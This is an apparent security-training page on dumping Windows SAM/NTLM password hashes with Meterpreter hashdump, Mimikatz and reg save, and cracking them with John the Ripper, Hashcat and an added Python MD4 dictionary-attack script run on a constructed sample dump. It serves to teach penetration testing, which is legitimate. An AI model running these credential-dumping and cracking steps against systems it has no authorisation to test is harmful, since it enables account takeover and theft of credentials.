# Dumping & Cracking Windows Hashes (NTLM Hashes)

### **Windows Password Hashes**

* The Windows OS stores the hashes of local user account passwords in the SAM (Security Accounts Manager) database; the plaintext passwords themselves are never stored.
* Hashing is a one-way transformation of a piece of data into a fixed-size value computed by a hash function (hashing algorithm). The result is known as a hash or hash value. Unlike encryption, there is no key that turns a hash back into the original input.
* Authentication and verification of user credentials are handled by the Local Security Authority (LSA), which runs inside the LSASS process (`lsass.exe`).
* Windows versions up to Windows Server 2003 store two different types of hashes for each account:
  * LM
  * NTLM (NT hash)
* From Windows Vista / Server 2008 onwards, Windows no longer stores LM hashes by default and relies on the NT hash alone.

### **SAM Database**

* SAM (Security Account Manager) is a registry hive file (`%SystemRoot%\System32\config\SAM`) that holds the local user accounts and their password hashes on Windows. No plaintext passwords are stored in it.
* The SAM file is held open exclusively by the kernel while the operating system is running, so a plain file copy fails. An administrator can still export it through the registry (`reg save HKLM\SAM sam.hiv` together with `reg save HKLM\SYSTEM system.hiv`) or read it from a Volume Shadow Copy.
* Because of that lock, attackers typically use in-memory techniques and tools running with SYSTEM privileges (Mimikatz, the meterpreter `hashdump` command) to read the hashes from the registry or from the LSASS process instead of touching the file.
* In modern versions of Windows, the hashes inside the SAM are additionally encrypted with the SYSKEY (boot key), which is derived from the SYSTEM hive. An offline SAM dump therefore also needs the SYSTEM hive before the hashes can be decrypted.

### **NTLM (NTHash)**

* NTLM is a family of challenge-response authentication protocols used in Windows to authenticate between computers. The password itself is never sent: the client proves knowledge of the NT hash (NTHash) of the user's password, which is why a stolen NT hash can be reused directly (pass-the-hash) as well as cracked.
* From Windows Vista onwards, Windows disables LM hash storage and relies on the NT hash.
* When a password is set, Windows encodes it as UTF-16LE and hashes it with the MD4 algorithm; only the resulting 16-byte NT hash is stored and the plaintext password is discarded. There is no salt, so identical passwords always produce identical hashes.
* The NT hash improves upon the LM hash in the following ways:
  * The password is not truncated to 14 characters and split into two 7-character halves that are hashed independently.
  * It is case-sensitive (LM converts the password to uppercase first).
  * It allows the use of symbols and Unicode characters.

<figure><img src="/files/9sNB4Vvv2zPKsJJpbvXC" alt=""><figcaption><p><strong>NTLM (NTHash)</strong></p></figcaption></figure>

## **Dumping & Cracking NTLM Hashes**

* We can dump Windows password hashes by leveraging various utilities like:
  * The inbuilt meterpreter “`hashdump`” command
  * [**`Mimikatz`**](https://github.com/ParrotSec/mimikatz)
* After we have dumped the hashes, we can crack them through the use of the following utilities:
  * [**`John The Ripper`**](https://www.openwall.com/john/)
  * [**`Hashcat`**](https://hashcat.net/hashcat/)

### **Meterpreter Commands:**

* **`pgrep lsass`** – Find the process ID (PID) of the `lsass.exe` process, which runs as SYSTEM.
* **`migrate 708`** – Migrate meterpreter into the process with PID 708 (the lsass PID found in the previous step). `hashdump` needs SYSTEM privileges, and running inside lsass provides them; `getsystem` is the alternative when migration is not possible.
* **`hashdump`** – Dump the SAM password hashes. Each output line is in pwdump format, `user:RID:LM hash:NT hash:::`; on a modern host the LM field is the constant `aad3b435b51404eeaad3b435b51404ee`, meaning no LM hash is stored.

### **Cracking Password Hashes with John the Ripper:**

To crack NT hashes using John the Ripper, point it at the dump and specify the hash format:

```bash
john --format=NT hashes.txt
```

`--format=NT` tells John that `hashes.txt` holds NT hashes; John reads the pwdump lines exactly as `hashdump` produced them, username included. Without a `--wordlist` option John runs its default modes (single-crack, then its built-in wordlist, then incremental brute force); add `--wordlist=/usr/share/wordlists/rockyou.txt` for a dictionary attack, and run John with `--show` afterwards to list the cracked accounts.

### **Cracking Password Hashes with Hashcat:**

To crack NT hashes using Hashcat with a wordlist, use a straight (dictionary) attack together with the NTLM hash mode:

```bash
hashcat -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
```

`-a 0` selects the straight (dictionary) attack and `-m 1000` the NTLM (NT hash) mode; Hashcat tries every word in `rockyou.txt` against the hashes in `hashes.txt`. Note that `-a 3` is the brute-force/mask attack, which would treat the last argument as a mask rather than a wordlist. Hashcat expects one bare 32-character NT hash per line: either extract the NT field from the `user:RID:LM:NT:::` lines first, or keep the lines as dumped and add `--username` so Hashcat parses them.
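The NT hash computation described in the NTLM section and the dictionary attack that the John and Hashcat commands above perform, as one added example in working code (not part of the original notes or of either tool): it computes NT hashes the way Windows does (MD4 over the UTF-16LE password, no salt), parses constructed `hashdump`-style lines in the `user:RID:LM:NT:::` format, and cracks them by hashing each wordlist entry once and looking it up against every account. The account names, sample dump and wordlist are constructed for the example; the MD4 implementation is included because Python's `hashlib` only offers MD4 through OpenSSL's optional legacy provider.

```python
"""NT hash computation and an offline dictionary attack on hashdump/pwdump output.
Added example; the sample dump, wordlist and account names below are constructed."""
from __future__ import annotations

import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field of a host that stores no LM hash
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password (MD4 of b"")


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320. hashlib's 'md4' sits in OpenSSL's optional legacy
    provider and is absent on many modern builds, hence a local implementation."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"  # padding: 0x80, zeros, then the 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password. No salt, so every
    user with the same password has the same hash; case and Unicode are preserved."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(dump: str) -> list[tuple[str, int, str, str]]:
    """Parse hashdump/pwdump lines 'user:RID:LMhash:NThash:::' into tuples."""
    rows = []
    for line in dump.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
        if len(nt) != 32 or any(ch not in "0123456789abcdef" for ch in nt):
            raise ValueError(f"malformed NT hash for {user!r}")
        rows.append((user, rid, lm, nt))
    return rows


def crack_nt_hashes(dump: str, wordlist: list[str]) -> dict[str, str | None]:
    """Dictionary attack: because NT hashes are unsalted, each candidate is hashed
    once and looked up against every account. Returns user -> password, '' for a
    blank password, None when the wordlist did not contain it."""
    lookup = {nt_hash(word): word for word in wordlist}
    results = {}
    for user, _rid, _lm, nt in parse_pwdump(dump):
        results[user] = "" if nt == EMPTY_NT else lookup.get(nt)
    return results


def accounts_with_lm_hash(dump: str) -> list[str]:
    """Users whose LM field is a real hash (old hosts, or LM storage re-enabled):
    crack those first with John --format=LM / Hashcat -m 3000, LM is far weaker."""
    return [user for user, _rid, lm, _nt in parse_pwdump(dump) if lm != EMPTY_LM]


# Constructed sample dump (not from a real host). LM fields carry the empty-LM
# marker a modern host prints; NT fields are computed here from known passwords,
# except Administrator, whose value is the well-known NT hash of "password".
SAMPLE_DUMP = "\n".join([
    f"Administrator:500:{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::",
    f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
    f"alice:1001:{EMPTY_LM}:{nt_hash('Summer2024!')}:::",
    f"bob:1002:{EMPTY_LM}:{nt_hash('Sommer2024ü')}:::",  # non-ASCII survives via UTF-16LE
    f"carol:1003:{EMPTY_LM}:{nt_hash('not-in-the-wordlist')}:::",
])

# Constructed wordlist; the case variants of "password" show that only the exact
# case matches an NT hash (an LM hash would have matched all three).
WORDLIST = ["123456", "PASSWORD", "Password", "password", "Summer2024!", "Sommer2024ü"]

if __name__ == "__main__":
    for user, pw in crack_nt_hashes(SAMPLE_DUMP, WORDLIST).items():
        print(f"{user:<14} {pw if pw is not None else '<not cracked>'!r}")
    print("accounts with a real LM hash:", accounts_with_lm_hash(SAMPLE_DUMP))
```

Running the script cracks Administrator, Guest (blank), alice and bob and leaves carol uncracked; `PASSWORD` and `Password` never match because the NT hash keeps the original case. The "hash each candidate once, look it up for every user" structure is the same reason John and Hashcat scale to thousands of unsalted NT hashes at almost no extra cost per hash.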

***

**`Hacker's Mantra:`**`Hackers: the rebels of the tech world.`


